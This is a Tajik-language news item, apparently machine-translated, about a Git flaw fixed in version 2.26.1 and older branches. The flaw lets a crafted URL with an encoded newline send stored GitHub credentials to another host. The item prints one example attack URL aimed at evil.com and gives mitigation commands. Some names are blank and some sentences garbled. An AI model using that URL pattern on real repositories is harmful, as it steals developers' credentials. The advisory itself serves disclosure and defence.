версияҳои ислоҳкунандаи системаи идоракунии сарчашмаҳои тақсимшудаи Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 ва 2.17.4, дар ки бартараф намуд () дар коркардкунанда "", ки боиси фиристодани эътимоднома ба ҳости нодуруст мегардад, вақте ки муштарии git ба репозиторий бо истифода аз URL-и махсус форматшуда, ки дорои аломати сатри нав мешавад, ворид мешавад. Ин осебпазирӣ метавонад барои ташкили эътимоднома аз ҳости дигар ба сервере, ки аз ҷониби ҳамлакунанда назорат мешавад, истифода шавад.
Ҳангоми муайян кардани URL ба монанди “https://evil.com?%0ahost=github.com/”, коркардкунандаи маълумоти эътимоднома ҳангоми пайвастшавӣ ба host evil.com параметрҳои аутентификатсияро, ки барои github.com муқаррар шудааст, мегузарад. Мушкилот ҳангоми иҷрои амалҳо ба мисли "git clone", аз ҷумла коркарди URL-ҳо барои зермодулҳо ба миён меояд (масалан, "git submodule update" URL-ҳои дар файли .gitmodules нишондодашударо аз анбори худкор коркард мекунад). Осебпазирӣ дар ҳолатҳое хатарноктар аст, ки таҳиякунанда анборро бидуни дидани URL клон мекунад, масалан, ҳангоми кор бо зермодулҳо ё дар системаҳое, ки амалҳои автоматиро иҷро мекунанд, масалан, дар скриптҳои сохтани баста.
Барои бастани осебпазирӣ дар версияҳои нав гузариши аломати сатри нав дар ҳама гуна арзишҳо, ки тавассути протоколи мубодилаи эътимоднома интиқол дода мешаванд. Барои тақсимот, шумо метавонед нашри навсозиҳои бастаҳоро дар саҳифаҳо пайгирӣ кунед , , , , , , .
Ҳамчун як роҳи ҳал барои бастани мушкилот Ҳангоми дастрасӣ ба анборҳои ҷамъиятӣ credential.helper-ро истифода набаред ва "git clone" -ро дар реҷаи "--recurse-submodules" бо анборҳои тафтишнашуда истифода набаред. Барои пурра хомӯш кардани коркардкунанда credential.helper, ки мекунад ва гирифтани паролҳо аз , мухофизат карда мешавад ё файли дорои паролҳо, шумо метавонед фармонҳоро истифода баред:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Манбаъ: opennet.ru